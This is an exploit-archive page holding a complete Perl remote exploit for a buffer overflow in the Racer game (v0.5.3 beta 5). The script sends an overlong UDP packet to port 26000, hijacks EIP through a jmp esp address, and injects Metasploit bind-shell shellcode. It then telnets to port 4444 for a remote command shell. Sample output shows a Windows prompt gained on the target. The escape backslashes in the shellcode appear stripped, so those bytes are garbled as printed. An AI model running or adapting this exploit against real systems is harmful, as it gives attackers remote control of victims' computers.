Racer v0.5.3 beta 5 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Racer v0.5.3 beta 5 Remote Buffer Overflow Exploit
# Published : 2007-08-13
# Author : n00b
# Previous Title : SurgeMail 38k (SEARCH) Remote Buffer Overflow Exploit
# Next Title : Savant 3.1 Get Request Remote Overflow Exploit (Universal)
#!/usr/bin/perl
###Credit's to n00b.
################################################
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer over flow in the
#server and client.Automatically the game open's
#Udp port 26000 and is waiting for a msg buffer.
#If we send an overly long buffer we are able to
#Control the eip register and esp hold's enough
#buffer to have a good size shell code.
###############################################
#Tested: Win Xp sp2 English
#Vendor's web site: http://www.racer.nl/
#Affected version's: all version's.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thank's to str0ke.
###########################


print <<End;
*****************************************************
Racer v0.5.3 beta 5 (12-03-07) remote exploit
=====================================================
Credit's to n00b for finding this bug and writing
the exploit.This exploit work's for the client
and the server.
*****************************************************

Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*****************************************************
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo
Luigi Auriemma.
*****************************************************
(*)Please wait
End

sleep 8;
system("cls");

use IO::Socket;

$ip = $ARGV[0];

$payload1 = "A"x1001;

#jmp esp 0x77D8AF0A user32.dll english
$jmpcode = "x0AxAFxD8x77";

#win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
#http://metasploit.com */.
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax67".
"x58x30x41x31x50x42x41x6bx42x41x77x32x42x42x42x32".
"x41x41x30x41x41x58x38x42x42x50x75x5ax49x49x6cx72".
"x4ax48x6bx32x6dx48x68x4cx39x39x6fx39x6fx69x6fx43".
"x50x6ex6bx50x6cx66x44x41x34x4cx4bx73x75x47x4cx6c".
"x4bx43x4cx57x75x30x78x75x51x7ax4fx4cx4bx42x6fx34".
"x58x4ex6bx41x4fx37x50x46x61x7ax4bx42x69x4ex6bx46".
"x54x6cx4bx63x31x6ax4ex50x31x49x50x4cx59x6ex4cx6f".
"x74x49x50x32x54x74x47x6fx31x6bx7ax44x4dx46x61x6f".
"x32x4ax4bx4ax54x77x4bx31x44x51x34x55x78x31x65x4b".
"x55x6cx4bx33x6fx75x74x63x31x38x6bx35x36x4ex6bx44".
"x4cx70x4bx4ex6bx43x6fx55x4cx36x61x78x6bx36x63x66".
"x4cx4ex6bx6fx79x42x4cx31x34x57x6cx75x31x78x43x75".
"x61x39x4bx50x64x4cx4bx57x33x34x70x4cx4bx77x30x64".
"x4cx4cx4bx70x70x37x6cx4cx6dx6ex6bx61x50x74x48x31".
"x4ex30x68x6cx4ex62x6ex44x4ex78x6cx72x70x39x6fx79".
"x46x63x56x76x33x70x66x42x48x56x53x37x42x53x58x62".
"x57x41x63x54x72x63x6fx51x44x59x6fx5ax70x50x68x7a".
"x6bx6ax4dx4bx4cx47x4bx62x70x59x6fx6ex36x71x4fx6f".
"x79x4dx35x43x56x6bx31x4ax4dx33x38x34x42x31x45x52".
"x4ax55x52x79x6fx6ex30x73x58x6ax79x77x79x4cx35x4c".
"x6dx52x77x39x6fx69x46x72x73x71x43x61x43x41x43x30".
"x53x42x63x46x33x42x63x71x43x4bx4fx58x50x71x76x30".
"x68x32x31x71x4cx65x36x41x43x6bx39x58x61x6ax35x63".
"x58x59x34x76x7ax30x70x4bx77x61x47x49x6fx4ax76x71".
"x7ax42x30x53x61x41x45x6bx4fx5ax70x53x58x6ex44x6c".
"x6dx64x6ex6dx39x36x37x49x6fx4bx66x73x63x30x55x39".
"x6fx4ex30x52x48x4dx35x41x59x6fx76x32x69x70x57x49".
"x6fx4ex36x66x30x66x34x30x54x43x65x4bx4fx4ax70x4f".
"x63x63x58x39x77x50x79x68x46x64x39x36x37x39x6fx4e".
"x36x70x55x4bx4fx6ex30x63x56x31x7ax32x44x42x46x31".
"x78x33x53x72x4dx4dx59x78x65x50x6ax52x70x70x59x57".
"x59x38x4cx6bx39x5ax47x31x7ax72x64x4ex69x4bx52x70".
"x31x49x50x78x73x4ex4ax4bx4ex71x52x56x4dx6bx4ex72".
"x62x34x6cx4fx63x6ex6dx33x4ax77x48x4ex4bx6cx6bx4c".
"x6bx55x38x32x52x6bx4ex58x33x56x76x59x6fx70x75x43".
"x74x49x6fx7ax76x43x6bx36x37x70x52x36x31x31x41x31".
"x41x52x4ax54x41x70x51x51x41x50x55x63x61x6bx4fx58".
"x50x73x58x4cx6dx79x49x43x35x4ax6ex31x43x4bx4fx7a".
"x76x71x7ax59x6fx4bx4fx64x77x6bx4fx38x50x4cx4bx50".
"x57x79x6cx4cx43x5ax64x70x64x4bx4fx4ex36x33x62x79".
"x6fx6ex30x41x78x4cx30x6fx7ax43x34x51x4fx50x53x79".
"x6fx4ax76x4bx4fx4ex30x67";

$payload2 = "B"x500;


if(!$ip)
{

die "remember the ipn";

}

$port = '26000';

$protocol = 'udp';

$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                              PeerPort=>$port,
                              Proto=>$protocol,
                               Timeout=>'1') || die "Make sure service
is running on the portn";

{
print $socket $payload1,$jmpcode,$shellcode,$payload2,;
print "[+]Sending malicious payload.n";
sleep 2;
system("cls");
print "[+]Done !!.n";
close($socket);
{
sleep 5;
print " + Connecting on port 4444 of $host ...n";
system("telnet $ip 4444");
close($socket);
 }
}

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
# C:Documents and Settings****Desktopracer053b5>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# www.Syue.com [2007-08-13]